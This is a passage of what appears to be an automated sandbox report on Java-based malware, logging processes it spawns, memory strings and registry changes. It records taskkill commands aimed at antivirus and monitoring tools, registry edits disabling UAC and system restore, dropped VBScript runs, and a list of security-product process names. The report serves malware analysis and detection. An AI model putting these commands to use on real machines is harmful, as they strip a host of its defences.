Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Uses taskkill to terminate processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Usc4>
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}#
Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}VBOX":false,"RAM":"8.0 GB"}c.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Us
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerkv;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2845247996.0000000004A29000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000006.00000002.2845247996.0000000004F14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\krmyqqmohp.txt","VBOX":false,"RAM":"8.0 GB"}],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi;2>
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DF03C0 cpuid 2_2_02DF03C0
Queries the installed Java version
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7388 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jartracer.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7564 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7620 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A93DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 6_2_73A93DFC
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable UAC(promptonsecuredesktop)
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: PromptOnSecureDesktop 0
Disables UAC (registry)
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Disables Windows system restore
Source: C:\Windows\SysWOW64\regedit.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
Disables zone checking for all users
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
AV process strings found (often used to terminate AV products)
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKService.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: acs.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
